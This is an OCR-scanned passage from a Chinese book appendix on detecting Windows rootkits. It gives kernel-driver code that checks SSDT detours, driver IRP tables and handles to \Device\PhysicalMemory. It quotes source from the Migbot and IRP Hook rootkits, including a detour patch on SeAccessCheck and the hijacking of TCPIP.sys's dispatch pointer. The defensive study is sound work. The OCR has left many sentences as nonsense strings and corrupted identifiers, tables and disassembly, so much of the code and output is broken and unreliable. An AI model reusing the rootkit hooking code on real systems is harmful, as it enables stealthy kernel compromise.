GetModInfoByAddress (d->TargetAddress,pMod) ; 
if (pMod != NULL) 
RtlStringCbCopyExA (d->detouringModule,256, 
pMod->ImageName, NULL, NULL, 0) ; 
else 
RtlStringCbCopyExA (d->detouringModule,256, 
pUnknownBuf,NULL,NULL, 0) ; 
//if the target of the CALL or JMP is not 
//in this module's memory address range, 
//this is a highly suspicious execution flow alteration 
if (!IsAddressWithinModule (d->TargetAddress, 
ModuleBaseAddr, ModuleSize) ) 
DetourFound=TRUE; 


我 们 刚才 展示 的 代码 说 明了 如 何 验证 SSDT 中 的 系统 服务 函数 没有 被 绕 开 。 


注意 : 下 面 展示 的 输出 来 自 于 我 们 的 驱动 程序 (以 C 语 言 编写 ) 。 为 了 获得 这 个 输出 ， 我 们 在 一 个 使 用 Sun 的 Virtual Box 软 件 
的 虚拟 客户 OS 中 调试 操作 系统 时 ， 在 源 代 码 中 发 出 DbgPrint () 命令 ， 并 在 WinDbg 中 捕捉 它 。 


下 面 是 一 个 简短 的 输出 列表 : 


Found Detoured? 


805987C6 
805E59A0 


805E91E6 
805E59D2 
805E9220 
805E5A08 
805E9264 
805E92A8 
8060A90C 


NtAcceptConnectPort 
NtAccessCheck 


NtAccessCheckAndAud 
NtAccessCheckByType 
NtAccessCheckByType 
NtAccessCheckByType 
NtAccessCheckByType 
NtAccessCheckByType 
NtAddAtom 


[unknown] 
[unknown] 


[unknown] 
[unknown] 
[unknown] 
[unknown] 
[unknown] 
[unknown] 
No [N/A] 


DetourAddr 
No [N/A] 
No [N/A] 
No [N/A] 
No [N/A] 
No [N/A] 
No [N/A] 
No [N/A] 
No [N/A] 


\system32\ntkrnlpa. 
\system32\ntkrnlpa. 


\system32\ntkrnipa. 
\system32\ntkrnlpa. 
\system32\ntkrnlpa. 
\system32\ntkrnilpa. 
\system32\ntkrnlpa. 
\system32\ntkrnipa. 


\system32\ntkrnlpa.exe 


注意 ， 有 多 少 个 “找到 ”的 函数 列 出 的 状态 为 未 知 ([unknown]) : 
个 函数 是 NtAddAtom () 。 


这 意味 着 这 些 


函数 未 被 内 核 输出 。SSDT 中 输出 的 第 一 


为 了 快速 测试 这 段 代 码 ， 我 们 安装 了 Migbot Rootkit， 它 在 SeAccessCheck (ntdll.dll 的 一 部 分 ) 的 序言 中 编写 了 一 个 


detour。 为 了 测试 这 个 detour， 我 们 使 用 前 面 讨 论 的 功能 编写 了 一 个 简短 的 例 程 LookForMigbot () 。 


注意 : 如 果 读 者 希望 测试 这 段 代 码 ， 必 须 使 用 Windows XP (没有 服务 包 ) 。 因 为 Migbot Rootkit 在 操作 之 前 首先 验证 


SeAccessCheck 来 自 这 个 版 本 的 Windows XP。 


VOID LookForMigbot () 


{ 


ULONG SeAccessCheckAddress; 
DWORD ntdll_base,ntdll_size=0; 
PDETOURINFO d; 
PSYSTEM MODULE_INFORMATION pNtdll; 
UNICODE STRING u; 
int j; 
//get the address of SeAccessCheck 
RtlIinitUnicodeString (&u, L"SeAccessCheck") ; 
SeAccessCheckAddress = MmGetSystemRoutineAddress (&u) ; 
if (SeAccessCheckAddress == NULL) 
{ 
DbgPrint ("\nLookForMigbot(): Failed to get the address 
of SeAccessCheck!") ; 
return; 
} 
d=ExAllocatePoolWithTag (NonPagedPool, sizeof (DETOURINFO) ,MY_TAG) ; 
//get module information for ntdll.dll 
pNtd1l1l=ExAllocatePoolWithTag (NonPagedPool, 
sizeof (SYSTEM _MODULE_INFORMATION) , 
MY_TAG) ; 
if (!GetModInfoByName ("ntd1ll.d11",pNtd1l1) ) 
{ 
DbgPrint ("\nLookForMigbot(): Failed to get the address 
of ntdll.dll!"); 
return; 
} 
//store module location and size for function 
ntdll base=(DWORD) pNtdll->Base; 
ntdll_size=(DWORD) pNtdll->Size; 
DbgPrint ("\nLookForMigbot(): Ntdll.dll base address found at %08X", 
ntdll base); 


DbgPrint ("\nLookForMigbot(): Ntdll.dll size is %ul",ntdll_size) ; 
DbgPrint ("\nLookForMigbot(): Address of SeAccessCheck: %08X", 


SeAccessCheckAddress) ; 
if (IsFunctionPrologueDetoured((DWORD) SeAccessCheckAddress, 
ntdll base,ntdll_size,d)) 


DbgPrint ("\nLookForMigbot(): Migbot detected!") ; 

DbgPrint ("\nLookForMigbot(): Overwritten prologue 
of SeAccessCheck:\n") ; 

//loop through possible decoded instructions 

for (j = 0;j<d->numDisassembled; j++) 

{ 

DbgPrint ("%08I64x (%02d) %s %s %s\n", 
d->decodedInstructions[j].offset, 
d->decodedInstructions[j].size, 

(char*) d->decodedInstructions [j] .instructionHex.p, 
(char*) d->decodedInstructions[j].mnemonic.p, 
(char*) d->decodedInstructions[j] .operands.p) ; 


} 
else 
{ 
DbgPrint ("\nLookForMigbot(): Migbot was not detected."); 
} 
} 
这 个 函数 执行 如 下 任务 : 


- 用 MmGetSystemRoutineAddress () 获得 SeAccessCheck 的 地 址 。 

- 查找 ntdll.dll (包含 SeAccessCheck) 的 基地 址 和 大 小 。 

- 用 函数 地 址 、 模 块 基地 址 、 模 块 大 小 以 及 用 detour 信 息 填写 的 DETOURINFO 结 构 调 用 IsFunctionPrologueDetouted () o 
来 自 干 净 系 统 的 前 一 个 函数 输出 如 下 : 


DriverEntry(): Looking for migbot.. 
LookForMigbot(): Ntdll.dll base address found at 7C900000 
LookForMigbot(): Ntdll.dll size is 7208961 

LookForMigbot () Address of SeAccessCheck: 805E5848 
LookForMigbot () Migbot was not detected. 


运行 Migbot 的 migloader (不 带 参数 ) 修补 SeAccessCheck (以 及 NtDevicelo-Control-File) 并 输出 覆盖 的 字 节 : 


My Driver Loaded! - 0x55 - Ox8B - OxEC - Ox6A - 0x01 - OxFF - 0x75 
- 0x2C - 0x55 - 0x8B = OxEC - 0x53 - 0x33 - OxDB 
- 0x38 - Ox5D - 0x24 


运行 这 个 检测 例 程 之 后 ， 得 到 的 输出 显示 SeAccessCheck 函 数 序言 被 覆盖 为 一 条 指向 Migbot 自 身 的 绕 开 消 数 的 远 JMP 指 令 
(加 重 显示 ) : 


DriverEntry(): Looking for migbot.. 


LookForMigbot () : 


LookForMigbot 
LookForMigbot 
LookForMigbot 
LookForMigbot 
8056fcdf (07) ea 
8056fce6 ( 90 
8056fce7 ( 90 
8056fces8 ( 
8056fcee ( 

( 

( 


() 
(): 
() 3 
3 


8056fcf1 


8056fcf7 56 


Ntdll.dll base address found at 77F50000 


Ntdll.dll size is 6922241 

Address of SeAccessCheck: 8056FCDF 

Migbot detected! 

Overwritten prologue of SeAccessCheck: 
5865af81 0800 JMP FAR 0x8:0x81af6558 
NOP 
NOP 


) 

) 

) O£84 98660000 JZ 0x80576386 
) 395d 08 CMP [EBP+0x8], EBX 
) O£84 a81a0700 JZ 0x805e179Ff 
) 


PUSH ESI 


注意 ， 远 JMP 的 记 法 与 本 附录 前 面 解释 的 x86 分 段 内 存 的 概念 一 致 。Migbot 驱 动 程序 中 的 C 代 码 精 确 匹配 这 一 输出 (除了 已 
经 解释 过 的 、 动 态 修改 的 0x11223344 之 外 ) ， 包 括 覆 盖 部 分 最 后 的 两 条 NOP 指 令 (操作 码 0x90) : 


char newcode[] = { OxEA, 0x44, 0x33, 0x22, 0x11, 0x08, 0x00, 0x90, 0x90 }; 


如 果 我 们 用 WinDbg 反 汇编 远 跳 转 指令 的 目标 地 址 (Ox81af6558) ， 将 会 看 到 Rootkit 绕 开 函 数 的 内 容 ， 这 个 函数 的 名 称 为 


my function detour seaccesscheck () : 


Seaccesscheck (): 


kd> u 0x81af6é558 
81af6558 55 
81af6559 8bec 
8laf655b 53 


push ebp 
mov ebp,esp 
push ebx 


8laf655c 33db xox ebx, ebx 

81af655e 385d18 cmp byte ptr [ebp+18h] ,bl 
8laf6é561 eae8fc56800800 jmp 0008: 8056FCE8 
8laf6568 55 push ebp 

8laf6é569 8bec mov ebp,esp 


注意 在 Migbot 驱 动 程序 源 代码 中 的 匹配 : 


__declspec(naked) my_function detour seaccesscheck ( ) 
asm 


// exec missing instructions 
push ebp 

mov ebp, esp 
push ebx 

xor ebx, ebx 

cmp [ebp+24], bl 
_emit OxEA 

_emit OxAA 

emit OxAA 

emit OxAA 

_emit OxAA 

_emit 0x08 


emit 0x00 


ae, 4RootkitaIsivAS Cldetourkiaia AAT PSS BISA iS eH AZteLOxXAAAAAAAA, IMUA 
SeAccessCheck 开 始 位 置 的 9 个 字 节 之 后 (添加 9 个 字 节 是 为 了 避免 无 限 循 环 ) 。 确 实 ， 我 们 可 以 通过 将 SeAccessCheck 地 址 加 
上 9 (从 我 们 自己 的 检测 代码 的 输出 ) 来 验证 Rootkit “标记 ” 了 正确 的 地 址 : 


8056FCDF + 9 = 8056FCE8 
Rootkit 中 的 对 应 源 代 码 为 : 
reentry address = ((unsigned long)SeAccessCheck) + 9; 


for (1=0;i1<200;i++) 


{ 


if( (OxAA == ((unsigned char *)non_paged memory) [i]) && 
(OxAA == ((unsigned char *)non_paged_memory) [i+1]) && 
(OxAA == ((unsigned char *)non_paged_memory) [i+2]) && 
(0 == ((unsigned char *)non_paged_memory) [i+3] ) ) 


// we found the address OxAAAAAAAA 

// stamp it w/ the correct address 

*( (unsigned long *) (&non_paged_memory[i]) ) = reentry_address; 
break; 


总 结 一 下 ， 请 记 住 这 种 技术 和 任何 启发 式 技术 一 样 ， 都 可 能 造成 假 阳性 ， 纯 粹 是 试验 性 的 。 任 何 检测 出 来 的 detour 都 可 能 
是 合法 的 操作 系统 热 修补 。 应 该 对 包含 修补 代码 的 模块 进行 进一步 分 析 以 了 解 它 究竟 是 detour 还 是 合法 的 。 


A.3 ”检测 IRP 钩 子 的 两 个 P 


现在 你 知道 如 何 检测 一 般 的 指针 钩子 和 修补 / 绕 开 的 代码 ，1IRP 钩 子 的 问题 分 解 为 另 一 个 需要 验证 的 数据 结构 。 因 此 ， 我 们 直 
接 跳 到 代码 (这 可 不 是 故意 的 俏皮 话 ! ) 。 


装 入 的 内 核 驱动 程序 的 列表 可 以 使 用 前 面 讨论 过 的 ZwQuerySystemlnformation () 获得 。 一 旦 你 拥有 了 装 入 驱动 程序 的 
列表 ， 就 只 需要 验证 其 中 一 个 。 为 了 本 小 节 的 目的 ， 我 们 将 使 用 Rootkit.com 上 的 TCP IRP Hook Rootkit 来 说 明 这 种 检测 。 这 
种 特殊 的 Rootkit 挂 钧 运行 操作 系统 TCP/IP 协 议 栈 的 驱动 程序 TCPIP.sys 的 IRP_MJ DEVICE_CONTROL 主 函数 代码 的 调度 例 程 。 
这 个 函数 代码 是 最 关键 的 函数 代码 之 一 ， 因 为 它 是 用 于 与 用 户 模式 应 用 程序 通信 的 一 个 主要 函数 。 通 过 挂钩 TCPIP.sys 中 的 这 个 
函数 代码 入 口 ，IRPHook 实 际 上 拦截 了 来 自 所 有 用 户 模式 应 用 程序 的 网 络 通信 。 

创建 这 个 指针 钩子 的 IRP Hook 源 代码 如 下 (我 们 为 源 代码 加 上 了 以 “HE COMMENT” 开 头 的 注释 ) : 


UNICODE STRING deviceTCPUnicodeString; 


WCHAR deviceTCPNameBuffer[] = L"\\Device\\Tcp"; 
pFile tcp = NULL; 
pDev_tcp = NULL; 


pDrv_tcpip = NULL; 
RtlinitUnicodeString (&deviceTCPUnicodeString, deviceTCPNameBuf fer) ; 
//HE COMMENT: this statement retrieves a pointer to the top of 
//the victim driver's device stack, in this case, \\Device\TCP 
ntStatus = IoGetDeviceObject Pointer (&deviceTCPUnicodeString, 
FILE READ DATA, 
&pFile tcp, 
&pDev_tcp) ; 
if (!NT_SUCCESS (ntStatus) ) 
return ntStatus; 
//HE COMMENT: This line retrieves a pointer to the DRIVER_OBJECT data 
//structure for the victim driver, so that we can access the IRP table 
//member of this data structure in the following line 
pDrv_tcpip = pDev_tcp->DriverObject; 
OldIrpMjDeviceControl = pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE CONTROL] ; 
//if the pointer for the driver's dispatch function for the IRP major code 
//IRP MJ DEVICE CONTROL is valid, perform a synchronized overwrite of this 
//pointer, effectively "hooking" all IRPs for that dispatch routine. 
if (OldIrpMjDeviceControl) 
InterlockedExchange ( 
(PLONG) &Drv_tcpip->MajorFunction[IRP MJ DEVICE CONTROL], 
(LONG) HookedDeviceControl) ; 
return STATUS SUCCESS; 


REAREA ARC TAAA Et FF FdetourlS4hayiZ7AR. PRAExamineDriverlrpTables () 调用 了 这 
段 代 码 ， 在 核心 内 存 中 装 入 的 驱动 程序 列表 中 循环 直到 找到 TCPIP.sys: 


VOID ExamineDriverIrpTables () 
{ 
PMODULE_LIST pModuleList; 
UINT bufsize=GetLoadedModuleListSize()j; 
PULONG returnLength=0; 
CHAR ModuleName [256] ; 
PCHAR nameStart; 
NTSTATUS nt; 
int i; 


//0 buffer size is returned on failure 
if (bufsize == 0) 

return; 
//loop through list of loaded drivers 
pModuleList=ExAllocatePoolWithTag (NonPagedPool,bufsize,MY_ TAG) ; 
//oops, out of memory... 
if (pModuleList == NULL) 


{ 


DbgPrint ("\nExamineDriverIrpTables(): [0] Out of memory.\n") ; 
return; 


} 


nt=ZwQuerySystemInformation (SystemModuleInformation, 


pModuleList, 
bufsize, 
returnLength) ; 
if (nt != STATUS SUCCESS) 
{ 
DbgPrint ("\nExamineDriverIrpTables(): [0] Error: 


ZwQuerySystemInformation() failed\n.") ; 

return; 
} 
//loop through the module list and find owning module of this function address 
//a module owns it if the function address falls in the module's memory space 
for (i=0;i< (long) pModuleList->ModuleCount ; i++) 
{ 

nameStart=pModuleList->Modules [i] . ImageName+ 

pModuleList->Modules [i] .ModuleNameOffset ; 
memcpy (ModuleName, 


nameStart, 
256-pModuleList->Modules [i] .ModuleNameOffset) ; 
DbgPrint ("\nExamineDriverIrpTables(): %s",ModuleName) ; 


//if we are on the driver we care about 
if (strcmp (ModuleName,"tcpip.sys") == 0) 


{ 


IsIrpTableHooked ("tcpip.sys", 
L"\\Device\\Tcp", 
(ULONG) pModuleList->Modules[i] .Base, 
(ULONG) pModuleList->Modules[i] .Size) ; 


return; 


IsirpHooked () 的 源 代码 与 前 面 介绍 的 SSDT 钩 子 /detour 检 测 代码 相同 ， 只 有 一 处 主要 的 例外 : 我 们 在 驱动 程序 的 IRP 表 
中 的 28 个 主要 IRP 函 数 代 码 中 循环 ， 而 不 是 SSDT 表 中 的 270 个 项 目 。 每 次 循环 我 们 都 验证 指针 引用 的 内 存 位 置 在 驱动 程序 中 。 
下 面 的 输出 显示 了 安装 IRP Hook 后 挂钩 的 IRP 项 目 (加 重 显 示 ) : 


ExamineDriverIrpTables(): ipsec.sys 
ExamineDriverIrpTables(): tcpip.sys 
IsDriverIrpTableHooked(): IRP Table for tcpip.sys and device \Device\Tcp: 


IRP MJ Address Name Hooked? Detoured? DetourAddr Module 
IRP MJ CREATE F70FBD91 [unknown] No No [N/A] tcpip.sys 
IRP MJ CREATE F70FBD91 [unknown] No No [N/A] tcpip. sys 
NAMED PIPE 

IRP_MJ_CLOSE F70FBD91 [unknown] No No [N/A] tcpip. sys 
IRP_MJ_READ F70FBD91 [unknown] No No [N/A] tcpip.sys 
IRP MJ WRITE F70FBD91 [unknown] No No [N/A] tcpip.sys 


IRP MJ QUERY  F7OFBD91 [unknown] No No [N/A] tcpip. sys 


INFORMATION 


IRP_MJ_SET_ F70FBD91 [unknown] No No [N/A] tcpip.sys 
INFORMATION 
IRP MJ QUERY _ F70FBD91 [unknown] No No [N/A] tcpip.sys 
IRP_MJ_SET_EA F70FBD91 [unknown] No No [N/A] tcpip.sys 
IRP MJ FLUSH F70FBD91 [unknown] No No [N/A] tcpip.sys 
BUFFERS 
IRP MJ QUERY F70FBD91 [unknown] No No [N/A] tcpip.sys 
VOLUME _INFORMATION 
IRP_MJ_SET_ F70FBD91 [unknown] No No [N/A] tcpip.sys 
VOLUME INFORMATION 
IRP MJ F70FBD91 [unknown] No No [N/A] tcpip.sys 
DIRECTORY CONTROL 
IRP MJ FILE F70FBD91 [unknown] No No [N/A] tcpip.sys 
SYSTEM CONTROL 
IRP MJ DEVICE _ F89EB132 [unknown] YES No [N/A] \??\c:\irphook. sys 
SYSTEM CONTROL 
IRP MJ_ F70FBFBO [unknown] No No [N/A] tcpip.sys 
_DEVICE_CONTROL 
IRP MJ_ F70FBD91 [unknown] No No [N/A] tcpip.sys 
_DEVICE_CONTROL 
IRP MJ LOCK _ F70FBD91 [unknown] No No [N/A] tcpip.sys 
CONTROL 
IRP MJ CLEANUP F70FBD91 [unknown] No No [N/A] tcpip.sys 
IRP_MJ_CREATE_ F70FBD91 [unknown] No No [N/A] tcpip.sys 
MATLSLOT 
IRP MJ QUERY _ F7OFBD91 [unknown] No No [N/A] tcpip.sys 
SECURITY 
IRP_MJ_SET_ F70FBD91 [unknown] No No [N/A] tcpip.sys 
SECURITY 
IRP MJ POWER F70FBD91 [unknown] No No [N/A] tcpip.sys 
IRP_MJ_SYSTEM_ F70FBD91 [unknown] No No [N/A] tcpip.sys 
CONTROL 
IRP MJ DEVICE F70FBD91 [unknown] No No [N/A] tcpip.sys 
CHANGE 
IRP MJ QUERY F7OFBD91 [unknown] No No [N/A] tcpip.sys 
QUOTA 
IRP_MJ_SET_ F70FBD91 [unknown] No No [N/A] tcpip.sys 
QUOTA 
IRP_MJ_PNP F70FBD91 [unknown] No No [N/A] tcpip.sys 
ExamineDriverIrpTables(): netbt.sys 
ExamineDriverIrpTables(): afd.sys 

) : 


ExamineDriverIrpTables ( netbios.sys 


和 预想 的 一 样 ，IRP Hook Rootkit 用 地 址 0xF89EB132 覆 盖 了 处 理 IRP_MJ_ DEVICE _ SYSTEM_CONTROL 函 数 代码 的 函数 指 
针 。 注 意 ， 所 有 其 他 IRP 调 度 处 理 函 数 指向 地 址 0xF70FBD91。 对 前 者 进行 反 汇 编 显示 了 Rootkit 调 度 例 程 的 前 几 个 字 节 ， 这 个 例 
程 代替 了 TCPIP.sys 中 的 合法 例 程 : 


kd> u F89EB132 
*** ERROR: Module load completed but symbols could not be loaded for irphook.sys 
irphook+0x1132: 


£89eb132 53 push ebx 


£89eb133 8b5c240c mov ebx,dword ptr [esp+0Ch] 


£89eb137 56 push esi 

£89eb138 8b7360 mov esi,dword ptr [ebx+60h] 
£89eb13b 803e0e cmp byte ptr [esi],0Eh 
£89eb13e 755f jne irphook+0x119f (f89eb19f) 
£89eb140 807e0100 cmp byte ptr [esi+1],0 
£89eb144 7559 jne irphook+0x119f (£89eb19f) 


要 注意 的 一 点 是 ， 我 们 只 是 验证 了 驱动 程序 的 IRP 函 数 处 理 程序 表 ; ERRIA., ER, AddDevice () 或 者 其 他 必 
要 的 例 程 也 可 能 被 挂钩 。 这 些 指针 也 应 该 被 验证 。 


AA 检测 IAT 钩 子 的 两 个 “P"” 


验证 给 定 模块 的 输入 地 址 表 (IAT) 涉及 遍历 目标 进程 的 装 入 模块 列表 和 检查 所 有 DLL 的 输入 ， 确 保 它们 指向 给 定 DLL 内 的 
位 置 。 这 种 方法 也 组 合 了 我 们 前 面 说 明 过 的 技术 。 因 此 ， 我 们 将 此 留 给 读者 作为 练习 ， 使 用 所 提供 的 代码 检测 IAT 钩 子 。 


A5 我们 的 第 三 种 技术 : 检测 DKOM 


我 们 已 经 介绍 了 两 个 “P” 的 检测 方法 ， 现 在 我 们 将 转向 第 三 种 也 是 最 后 一 种 检测 技术 : 通过 句柄 检查 检测 DKOM。 在 本 小 
节 中 ， 检 测 方 法 仅仅 处 理 试图 从 用 户 模式 通过 修改 段 对 象 \Device\PhysicalMemory 来 改变 内 核 结构 的 DKOM 变 种 。 这 种 方法 
将 能 对 抗 使 用 这 个 段 对 象 的 任何 Rootkit， 例 如 那些 试图 安装 调用 门 的 Rootkit 和 各 种 其 他 实例 ， 在 VX 
Heaven (http://vx.netlux.org/vx.php?id=ep12) 、《Phrack》 杂 志 (http://vx.netlux.org/vx.php?id=ep12) 和 The Code 
Project (http://www.codeproject.com/KB/system/soviet kernel hack.aspx) 上 能 找到 一 些 实例 。 


注意 : 这 种 DKOM 形 式 在 Windows2003Server Service Pack1 之 外 的 系统 上 无 效 。 


因为 DKOM 直 接 在 内 存 中 修改 数据 结构 ， 检 测 DKOM 行 为 的 副作用 非常 困难 。 某 些 形 式 的 DKOM 依 赖 于 从 用 户 模式 使 用 段 
对 象 \Device\PhysicalMemory 直 接 写 入 内 存 。 因 此 ， 一 种 相当 基本 的 检测 方法 是 检查 每 个 进程 打开 的 句柄 ， 查 看 是 否 存在 指 
向 \\Device\PhysicalMemory 的 句柄 。 


Windows 中 每 个 可 访问 资源 都 由 一 个 对 象 表 示 ， 所 有 对 象 由 对 象 管理 器 管理 。 对 象 的 例子 包括 端口 、 文 件 、 线 程 、 进 程 、 
注册 表 键 值 以 及 同步 原 语 (如 互 斥 体 、 信 和 号 量 、 自 旋 锁 ) 。 在 任何 给 定 的 时 刻 ， 有 数 干 个 对 象 被 异步 和 同步 地 创建 、 更 新 、 访 问 
和 删除 。 对 象 管理 器 为 打开 指向 对 象 的 句柄 的 进程 和 线程 处 理 这 些 操作 。 对 象 在 所 有 打开 指向 它 的 进程 和 线程 释放 和 句柄 之 前 不 会 
被 释放 。 这 个 检测 例 程 将 获得 一 个 打开 的 句柄 的 列表 ， 并 且 检 查 对 应 对 象 的 名 称 是 否 匹配 字符 
& “\\Device\PhysicalMemory” , 


注意 : 对 打开 的 句柄 的 查询 只 是 一 个 即时 快照 ， 因 此 检测 例 程 的 有 效 性 仅 限 于 检测 在 获取 句柄 列表 时 DKOM Rootkit 是 否 活 
动 。 更 可 靠 的 检测 方法 包括 注册 一 个 内 核 模 式 回调 例 程 ， 每 当 指向 一 个 对 象 的 新 句柄 创建 时 得 到 对 象 管理 器 的 通知 。 


为 了 完成 这 一 任务 ， 我 们 已 经 编写 了 一 个 新 的 函数 FindPhysmemHandles () 。 这 个 函数 简单 地 枚 举 打 开 句 柄 的 列表 ， 尝 
试 读 取 每 个 句柄 对 应 的 对 象 名 称 。 如 果 名 称 为 “\Device\PhysicalMemory”， 这 个 进程 打开 了 一 个 指向 该 资源 的 句柄 ， 则 它 
是 可 疑 的 。 


第 一 个 任务 是 使 用 我 们 的 老 朋 友 ZwQuerySystemlnformation () 获得 整个 系统 范围 内 打开 的 句柄 列表 : 


ZwQuerySystemInformation (): 


VOID FindPhysmemHand1les () 
{ 
PHANDLE LIST pHandleList; 
ULONG bufsize=GetInformationClassSize (SystemHandleInformation) ; 
ULONG returnLength=0; 
int nameFail=0, otherFail=0,numFound=0; 
CHAR ModuleName [256]; 
PCHAR nameStart; 
NTSTATUS nt; 
UNICODE STRING ObjectName; 
UNICODE STRING DevicePhysicalMemory; 
PVOID Object; 
int i; 


//front matter 
DWORD* buff=(DWORD*) ExAllocatePoolWithTag (NonPagedPool,4096,MY_ TAG); 
RtlInitUnicodeString (&DevicePhysicalMemory,L"\\Device\\PhysicalMemory") ; 


pHandleList=(PHANDLE LIST) ExAllocatePoolWithTag (NonPagedPool,bufsize,MY TAG) ; 
nt=ZwQuerySystemInformation (SystemHandleInformation, 


pHandleList, 
bufsize, 
&returnLength) ; 
if (nt != STATUS SUCCESS) 
{ 
DbgPrint ("\nFindPhysmemHandles(): [0] Error: 
ZwQuerySystemInformation() failed.\n") ; 
return; 
} 
DbgPrint ("\nFindPhysmemHandles () : [0] Found %d handles.\n",pHandleList- 
>HandleCount) ; 


接 下 来 ， 我 们 在 打开 句柄 的 列表 中 循环 ， 搜 索 需 要 的 字符 串 : 


//loop through the list of open handles across the system and match any that 
//nave the name \\Device\PhysicalMemory and then inspect the owner of that handle 
for (i=0;i< (long) pHandleList->HandleCount ; i++) 
{ 
if (GetHandleInfo (pHandleList->Handles [i] .ProcessId, 
(HANDLE) pHandleList->Handles [i] .Handle, £ObjectName, &nameFail, &otherFail) ) 


if (RtlCompareUnicodeString (&ObjectName, &DevicePhysicalMemory, 
FALSE) == 0) 


DbgPrint ("\nFindPhysmemHandles(): Process %d 
has a handle open to 
\\Device\PhysicalMemory!!.\n", 
pHandleList->Handles [i] .ProcessIqd) ; 

numFound++; 


} 
} 


if (nameFail+otherFail > 0) 
DbgPrint ("\nFindPhysmemHandles(): Warning: %i name resolution failures and 
$i other failures.",nameFail,otherFail) ; 
DbgPrint ("\nFindPhysmemHandles(): Found %i open handles to 
\\Device\PhysicalMemory.",numFound) ; 
ExFreePoolWithTag (pHandleList,MY_ TAG) ; 


这 个 功能 的 核心 在 GetHandlelnfo () 函数 中 实现 ， 该 函数 采用 存储 在 ?>YSTEM_HANDLE_INFORMATION 结 构 (通过 
ZwQuerySystemInformation () 获得 的 打开 句柄 列表 由 这 个 结构 的 一 个 数组 组 成 ) 中 的 句柄 ， 并 使 该 进程 能 够 访问 对 应 的 对 
象 。 这 样 做 是 必要 的 ， 因 为 任何 来 自 于 打开 句柄 列表 中 的 特定 句柄 在 进程 上 下 文中 毫 无 意义 ; 它 只 在 获得 该 句柄 的 进程 上 下 文中 
有 效 。 因 此 ， 我 们 必须 调用 ZwDuplicateObject () 在 我 们 的 进程 地 址 空间 中 建立 该 句柄 的 一 个 副本 ， 然 后 才能 调用 
ZwQueryObject () 获得 对 象 名 称 。 下 面 是 使 我 们 的 进程 能 够 访问 该 对 象 的 步骤 : 


1) 调用 ZwOpenpProcess () 获得 指向 拥有 所 要 检查 的 对 象 的 进程 的 一 个 句柄 。 

2) 将 第 1 步 中 的 句柄 传递 给 ZwDuplicateObject () ， 以 获得 在 进程 上 下 文中 有 效 的 相同 句柄 。 
然后 ， 我 们 可 以 得 到 对 象 的 名 称 ， 如 下 列 步 又: 

3) 调用 ZwQueryObject () 获得 基本 信息 ， 具 体 地 说 就 是 类 型 结构 的 大 小 。 

4) 使 用 第 1 步 的 大 小 调用 ZwQueryObject () 获得 类 型 信息 。 

5) 调用 ZwQueryObject () 获得 名 称 信息 。 

完成 这 5 个 步骤 的 代码 如 下 面 的 GetHandlelnfo () 函数 中 所 示 : 


BOOL GetHandleInfo(ULONG pid, 
HANDLE hObject, 
PUNICODE STRING ObjectName, 
int* nameFailCount, 
int* otherFailCount) 


CLIENT ID C; 

OBJECT ATTRIBUTES ©; 

ULONG returnLength, returnLength2,size=0; 
HANDLE hProcess,hDuplicateObject=NULL; 
POBJECT TYPE INFORMATION oti; 

POBJECT BASIC INFORMATION obi; 

NTSTATUS nt; 


DWORD* nameBuff=NULL; 

UNICODE STRING ProcessName; 

BOOL objNameResolutionFail; 

c.UniqueProcess = pid; 

c.UniqueThread = 0; 

o.Length=sizeof (OBJECT ATTRIBUTES) ; 
InitializeObjectAttributes(&0,0,0,0,0); 

//open the process so we can duplicate its handle 
nt=ZwOpenProcess(&hProcess, PROCESS DUP_HANDLE, &0, &C) ; 
if (nt != STATUS SUCCESS) 


{ 


DbgPrint ("\nGetHandleInfo(): Error: ZwOpenProcess () 


failed on pid %d: %08X",pid,nt); 
(*otherFailCount) ++; 
return FALSE; 


//now duplicate the handle we wish to examine further 
nt=ZwDuplicateObject (hProcess, 
hObject, 
(HANDLE) OxXFFFFFFFF, 
&hDuplicateObject, 
0, 
0, 
DUPLICATE SAME ACCESS) ; 
if (nt != STATUS SUCCESS || hDuplicateObject == NULL) 


{ 


DbgPrint ("\nGetHandleInfo(): Error: ZwDuplicateObject () 


failed on pid %d: %08X",pid,nt) ; 


ZwClose(hProcess) ; 
(*otherFailCount) ++; 
return FALSE; 
} 
//get object basic information 
obi= (POBJECT BASIC INFORMATION) 
ExAllocatePoolWithTag (NonPagedPool, 
sizeof (OBJECT BASIC INFORMATION) , 
MY TAG) ; 
nt=ZwQueryObject (hDuplicateObject, 
ObjectBasicInformation, 


obi, 
sizeof (OBJECT BASIC INFORMATION), 
&returnLength) ; 
if (nt l= STATUS_SUCCESS ) 
{ 
DbgPrint ("\nGetHandleInfo(): Error: ZwQueryObject() failed 


to get object basic information: %08X",nt); 
ZwClose (hDuplicateObject) ; 
ZwClose(hProcess) ; 
(*otherFailCount) ++; 
return FALSE; 
} 
//get object type information 
oti= (POBJECT TYPE INFORMATION) 


ExAllocatePoolWithTag (NonPagedPool, 
obi->TypeInformationLength, 
MY TAG) ; 
nt=ZwQueryObject (hDuplicateObject, 
Obj ectTypeInformation, 
oti, 
obi->TypeInformationLength, 
&returnLength) ; 
//if there was a size mismatch problem, the variable returnLength 
//will have the required size 
if (nt == STATUS INFO LENGTH MISMATCH) 
{ 
//free the memory and reallocate at correct size 
ExFreePoolWithTag (oti,MY TAG) ; 
oti= (POBJECT TYPE INFORMATION) ExAllocatePoolWithTag (NonPagedPool, 
returnLength,MY_TAG) ; 
nt=ZwQueryObject (hDuplicateObject, 
ObjectTypeInformation, 


oti, 
returnLength, 
&returnLength2) ; 
} 
//failed again? bail... 
if (nt != STATUS SUCCESS) 
{ 
DbgPrint ("\nGetHandleInfo(): Error: ZwQueryObject() failed 


to get object type information: %08X",nt); 
ExFreePoolWithTag (obi,MY_TAG) ; 
ExFreePoolWithTag (oti,MY_TAG) ; 
ZwClose (hDuplicateObject) ; 
ZwClose (hProcess) ; 
(*otherFailCount ) ++; 
return FALSE; 
} 
//get object NAME information 
nt=ZwQueryObject (hDuplicateObject, 
Obj ectNameInformation, 
nameBuff, 
0, 
&returnLength) ; 
//use the returnLength variable to reallocate an appropriately-sized buffer 
if (nt == STATUS INFO LENGTH MISMATCH && returnLength) 
{ 
//allocate our second buffer with the correct size 
nameBuf f=ExAllocatePoolWithTag (NonPagedPool, returnLength,MY_TAG) ; 
nt=ZwQueryObject (hDuplicateObject, 
ObjectNameInformation, 
nameBuff, 
returnLength, 
&returnLength2) ; 
objNameResolutionFail=FALSE; 


} 


else if (returnLength == 0) 


{ 


objNameResolutionFail=TRUE; 


} 


//if nameBuff is NULL, we failed to get name information above - 


//return FALSE even though 
//technically a valid object exists here, we don't know its name though. 


